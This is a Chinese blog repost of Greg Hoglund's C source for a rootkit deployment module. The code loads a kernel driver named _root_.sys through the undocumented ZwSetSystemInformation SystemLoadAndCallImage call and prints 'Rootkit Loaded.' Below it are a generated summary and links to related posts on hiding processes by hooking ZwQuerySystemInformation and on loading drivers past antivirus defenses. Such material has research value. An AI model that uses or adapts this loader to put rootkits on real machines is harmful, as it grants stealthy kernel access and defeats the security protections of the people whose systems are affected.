用ZwSetSystemInformation函数的SystemLoadAndCallImage调用驱动

最新推荐文章于 2020-07-04 12:28:53 发布
转载 最新推荐文章于 2020-07-04 12:28:53 发布 · 592 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/fanzi2009/archive/2010/03/19/1689645.html

本文介绍了一种新的根套件部署模块,通过修改系统信息类加载和调用映像,实现根套件的加载。使用ntdll.dll中的RtlInitUnicodeString和ZwSetSystemInformation函数,将指定路径的根套件模块加载到系统中。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

//////////////////////////////////////// 
// New Deployment Module for rootkit 040 
// ------------------------------------- 
// -Greg Hoglund http://www.rootkit.com 
//////////////////////////////////////// 
#include <windows.h> 
#include <stdio.h> 


typedef struct _UNICODE_STRING { 
    USHORT Length; 
    USHORT MaximumLength; 
#ifdef MIDL_PASS 
    [size_is(MaximumLength / 2), length_is((Length) / 2) ] USHORT * Buffer; 
#else // MIDL_PASS 
    PWSTR  Buffer; 
#endif // MIDL_PASS 



} UNICODE_STRING, *PUNICODE_STRING; 


typedef unsigned long NTSTATUS; 
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0) 

NTSTATUS (__stdcall *ZwSetSystemInformation)( 
  IN DWORD SystemInformationClass, 
  IN OUT PVOID SystemInformation, 
  IN ULONG SystemInformationLength 
  ); 


VOID (__stdcall *RtlInitUnicodeString)( 
  IN OUT PUNICODE_STRING  DestinationString, 
  IN PCWSTR  SourceString 
  ); 


typedef struct _SYSTEM_LOAD_AND_CALL_IMAGE 
{ 
 UNICODE_STRING ModuleName; 



} SYSTEM_LOAD_AND_CALL_IMAGE, *PSYSTEM_LOAD_AND_CALL_IMAGE; 


#define SystemLoadAndCallImage 38 

void main(void) 
{ 
	/////////////////////////////////////////////////////////////// 
	// Why mess with Drivers? 
	/////////////////////////////////////////////////////////////// 
	SYSTEM_LOAD_AND_CALL_IMAGE GregsImage; 
	WCHAR daPath[] = L"\\??\\C:\\_root_.sys"; 


	////////////////////////////////////////////////////////////// 
	// get DLL entry points 
	////////////////////////////////////////////////////////////// 
	if( !(RtlInitUnicodeString = 
		(void *) GetProcAddress( GetModuleHandle("ntdll.dll"), 
		"RtlInitUnicodeString" )) ) 
		exit(1); 


	if( !(ZwSetSystemInformation = 
		(void *) GetProcAddress( GetModuleHandle("ntdll.dll"), 
		"ZwSetSystemInformation" )) ) 
		exit(1); 


	RtlInitUnicodeString(  &(GregsImage.ModuleName), 
		daPath ); 


	if NT_SUCCESS( 
		ZwSetSystemInformation(  SystemLoadAndCallImage, 
		&GregsImage, 
		sizeof(SYSTEM_LOAD_AND_CALL_IMAGE)) ) 
	{ 
		printf("Rootkit Loaded.\n"); 
	} 
	else 
	{ 
		printf("Rootkit not loaded.\n"); 
	} 


}

转载于:https://www.cnblogs.com/fanzi2009/archive/2010/03/19/1689645.html

通过ZwSetSystemInformation和ZwLoadDriver加载驱动
03-24 1505
入手阶段,先收集了两个driver的loader的代码,两者都是通过从ntdll.dll的导出的内核函数进行动态的驱动加载,这两个方式都是通常比较常见的方式.我这里对收集到的代码进行了整理,分离,修改,并在我机器WinXP SP2+VS 2005下编译测试
InlineHook任务管理器_ZwQuerySystemInformation_隐藏进程
yeanhoo的博客
09-24 717
InlineHook任务管理器_ZwQuerySystemInformation_隐藏进程 hook步骤: 查找目标函数地址 修改目标函数第一条指令跳转到我们构造的函数 卸载掉钩子,执行正常的目标函数 过滤掉特定信息后返回 hook代码如下 #include<windows.h> #include<Winternl.h> BOOL hook_code(); BOOL unHook_code(); NTSTATUS WINAPI NewZwQuerySystem
ZWSetSystemInformation加载驱动
weixin_34389926的博客
03-29 325
zwSetSystemInformation函数是个未公开的函数调用38号会加载驱动,对应的第二个参数为SYSTEM_LOAD_AND_CALL_IMAGE结构体,第三个参数为SYSTEM_LOAD_AND_CALL_IMAGE结构体的长度.. [cpp]view plaincopyprint? #include<...
(转载)用SystemLoadAndCallImage加载Rootkit
Kendiv's Box
11-12 2081
SystemLoadAndCallImage加载Rootkit转自:http://www.xfocus.net创建时间:2003-09-25文章属性:原创文章提交:Sephiroth_ (kinvis_at_hotmail.com)Sephiroth.V[前言]    我最近对NT Rootkit开始感兴趣,无奈国内的资料少得惊人,在这方面几乎是一片空白,就只有翻译的Gary Hoglund的一
SystemLoadAndCallImage加载Rootkit
勿在浮沙筑高台
03-12 645
 [前言]    我最近对NT Rootkit开始感兴趣,无奈国内的资料少得惊人,在这方面几乎是一片空白,就只有翻译的Gary Hoglund的一篇《一个修改NT内核的真实的ROOTKIT》。到国外的网站转了几天倒是收获非浅,国外在这方面的研究确实深刻多了。现在我翻译另一篇Gary Hoglund的文章,在这篇文章里我加入了一些个人的注释,如果大家对NT ROOTKIT感兴趣的
Loading Rootkit using SystemLoadAndCallImage
热门推荐
fisher_jiang的专栏
01-19 1万+
From: Greg Hoglund Date: Tue, 29 Aug 2000 12:31:48 -0700 Greets, For a while there has been a thread on NTBUGTRAQ about kernel-mode protection from rootkits. This is good - the whole point of o
ZwSetSystemInformationSystemLoadAndCallImage 加载驱动的缺陷
xuplus的专栏
04-23 2445
绕过监控进入ring0安装驱动这部分是重中之重。由于几乎每个主动防御系统都会监控未知驱动的加载和试图进入ring0的举动, 而我们在第一,第二和第三部分绕过主动防御要做的处理,都必须需要ring0权限。因此监控进入ring0,是一个独立的话题,也是我们实现前三个部分需要的条件。直接添加注册表项,ZwLoadDriver安装驱动,是几乎要被任何主动防御系统报警。必须要采用一些隐蔽的或者是为人不知的方
动态加载驱动程序源代码
06-14
源代码包含三种不同的驱动加载方法,使用ZwSetSystemInformation函数加载驱动,使用NtLoadDriver函数加载驱动,使用服务控制管理器加载驱动,还包括三种线程注入技术,使用RtlCreateUserThread 函数注入线程,使用...
全面解析:三种驱动加载与线程注入技术实现
使用ZwSetSystemInformation函数加载驱动 `ZwSetSystemInformation`是Windows内核提供的一种功能强大的系统调用,它可以用来设置系统信息或控制系统行为。在使用`ZwSetSystemInformation`动态加载驱动程序的上下...
Windows驱动源程序
12-15
1. 设备驱动架构:了解WDM驱动的三层结构——函数驱动、筛选器驱动和总线驱动,以及它们的角色和交互方式。 2. IRP(I/O请求包):驱动程序通过IRP来接收和处理来自操作系统的I/O请求,学习如何正确地排队、分发和...
ZwSetSystemInformation释疑
Rookie Rock
11-13 1601
ZwSetSystemInformation比较特殊,用了那段经典的加载方法,会发现老是加载不成功,到底成不成呢?我用VMWARE+WinDbg测试了,lm,发现服务列表里面是有了的,但是dbgview没有输出。在这里(http://hi.baidu.com/hypkb/blog/item/fe58b7830b377498f603a6f4.html)找到这样一段话: 起初是在那本书上面看到的,可惜怎么试都是失败,本身很简单就调调API的问题,再后来看到这篇:用SystemLoadAndCallImage加载
zwSetSystemInformation加载驱动
小驹的专栏
05-19 4633
zwSetSystemInformation函数是个未公开的函数调用38号会加载驱动,对应的第二个参数为SYSTEM_LOAD_AND_CALL_IMAGE结构体,第三个参数为SYSTEM_LOAD_AND_CALL_IMAGE结构体的长度.. #include #include #define NT_SUCCESS(Status) ((NTSTATUS)(Status) >
ZwSetSystemInformation的使用
04-02 2160
實驗對象:卡巴7.0.0.125實驗函數:ZwSetSystemInformation實驗內容:繞過卡吧裝驅動(多麽恐怖的事),結果將會使系統失去防禦 // TestKisOfZwSetSystemInformation.cpp : Defines the entry point for the console application.// #include #
ZWSETSYSTEMINFORMATION过卡巴
08-29 1335
一段算是针对卡巴的程序2007-07-08 22:06 OD代码:0040130B    |.    68 54304000     push      00403054                           ; /Arg1 = 00403054 ASCII "a
通过ZwSetSystemInformation驱动中加载驱动
pureman_mega的博客
07-04 1100
环境:win7 32 ,材料: ntoskrnl.exe , spldr.sys spsys.sys 看到一个文件叫spldr.sys,loader for security processor,一个加载器。于是就进去看看如何实现的。在spldr.sys 里面看到字符串 SystemRoot\system32\drivers\spsys.sys ,应该就是要加载这个驱动了。再看字符串的引用位置,发现调用ZwSetSystemInformation,应该就是通过这个函数来加载驱动的。下面是调用情况: .
一个加载驱动的API - ZwSetSystemInformation
4SecNet团队专栏
11-15 651
ZwSetSystemInformation( IN SYSTEM_IMFORMATION_CALSS SystemInformationClass, IN OUT PVOID SystemInformation, IN ULONG SystemInformationLength); 第一个参数:SystemInformationClass:将被设置的系统信息的类型,值为SYSTEM_IMFORM...
Greg Hoglund大牛的ZwSetSystemInformation()加载驱动
blackbean的专栏
09-16 807
这里备份一下: #include #include typedef struct _UNICODE_STRING {     USHORT Length;     USHORT MaximumLength; #ifdef MIDL_PASS
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值